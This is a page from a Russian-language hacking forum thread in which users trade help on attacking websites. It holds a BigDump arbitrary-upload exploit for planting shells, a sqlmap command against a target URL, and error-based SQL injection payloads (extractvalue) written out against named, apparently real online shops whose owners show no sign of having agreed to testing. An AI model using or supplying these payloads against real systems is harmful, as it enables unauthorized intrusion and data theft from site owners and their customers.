HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1521  
Старый 02.12.2016, 19:37
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Тут во втором примере ошибка?

http://2sql.ru/novosti/sql-limit/

SELECT UniversityName FROM Universities LIMIT 4, 6

не даст 4 5 6 запись?

Типо покажи 6 записеи начиная с 4?

А 4 это 5 потому что нумерация начинается с 0.Я прав?
 
Ответить с цитированием

  #1522  
Старый 03.12.2016, 05:28
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049

Репутация: 0
По умолчанию

подскажите пожалуйста как использовать данную уязвимость https://www.exploit-db.com/exploits/32479/

Цитата:
Сообщение от None  
[+] Arbitrary Upload on BigDump v0.35b
[+] Date: 23/03/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage:
http://www.ozerov.de/bigdump/
[+] Contact:
felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: bigdump.php
[+] Version: v0.35b
[+] Exploit :
http://host/bigdump.php?start=
[+] PoC:
http://SERVER/bigdump.php?start=
Note: allows upload files and shells with tamperdate.
 
Ответить с цитированием

  #1523  
Старый 03.12.2016, 14:44
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

В одном сайте,который на Yii 1.1.14 в text=1'&type=0&view=search ( где кавычка ) можно крутить . Только вот не понимаю какие запросы составлять . Есть желающие помочь?

PHP Version 4.4.45

Curl 7.19.7

OpenSSL 1.0.1e-fips 11 Feb 2013

MySQL 5.1.59

---------------------------------------

Стандартная ошибка CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near и.т.д
 
Ответить с цитированием

  #1524  
Старый 03.12.2016, 18:17
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

sqlmap не работает?
Параметры 'id' 'text' и.т.д воспринимает как за команду в консоли .
 
Ответить с цитированием

  #1525  
Старый 03.12.2016, 18:28
pw0ned
Guest
Сообщений: n/a
Провел на форуме:
33728

Репутация: 14
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

Параметры 'id' 'text' и.т.д воспринимает как за команду в консоли .
Код:
Code:
sqlmap.py -u "http://site.ru/?text=1&type=0&view=search" --dbs
 
Ответить с цитированием

  #1526  
Старый 03.12.2016, 20:14
hiderat
Guest
Сообщений: n/a
Провел на форуме:
3584

Репутация: 0
По умолчанию

Подскажите. Из из майкрософт sql можно отдать команду в cmd?
 
Ответить с цитированием

  #1527  
Старый 05.12.2016, 00:30
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049

Репутация: 0
По умолчанию

Цитата:
Сообщение от swat_  
swat_ said:

подскажите пожалуйста как использовать данную уязвимость
https://www.exploit-db.com/exploits/32479/
up

не кто не сталкивался?
 
Ответить с цитированием

  #1528  
Старый 05.12.2016, 01:16
mlmeet
Guest
Сообщений: n/a
Провел на форуме:
1314

Репутация: 0
По умолчанию

Всем привет. Лет пять не пользовала SQL инъекции, подзабыла все

Есть инъект вида http://сайт.ru/korzina'/

Извергает ошибку:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''korzina'' LIMIT 0, 1' at line 1 -

SELECT * FROM `tehnocity_menu` WHERE `sim_link`='korzina'' LIMIT 0, 1

Но как бы я дальше не ковыряла, ничего толком не выходит. Направьте в какую сторону копать.

Что пробовала:

Втыкала Юнион. Не проскакивает. Такое впечатление, что -- не отрабатывает вообще. Не отбрасывается хвост запроса хоть убей.

В общем на вас вся надежда

Вот пример http://stylesosh.ru/Orangevaya-tolstovka'/

Вот сайт на той же CMS и другой дырявый скрипт

http://www.pulverisator.ru/Trubki/?orderby=pric'e&par=dec
 
Ответить с цитированием

  #1529  
Старый 05.12.2016, 12:16
mlmeet
Guest
Сообщений: n/a
Провел на форуме:
1314

Репутация: 0
По умолчанию

Цитата:
Сообщение от palec2006  
palec2006 said:

Код:
Code:
http://stylesosh.ru/Orangevaya-tolstovka'and+extractvalue(1,concat(0x3a,(version())))and'/
Код:
Code:
http://www.pulverisator.ru/Trubki'and+extractvalue(1,concat(0x3a,(version())))and'/
Спасибо! В целом вижу, что работает, но никогда не пользовалась extractvalue. Как мне подставить запрос сюда? Если вместо version(), то пишет Only constant XPATH queries are supported
 
Ответить с цитированием

  #1530  
Старый 05.12.2016, 12:54
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от mlmeet  
mlmeet said:

Спасибо! В целом вижу, что работает, но никогда не пользовалась extractvalue. Как мне подставить запрос сюда? Если вместо version(), то пишет Only constant XPATH queries are supported
http://securityidiots.com/Web-Pentes...ractvalue.html
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ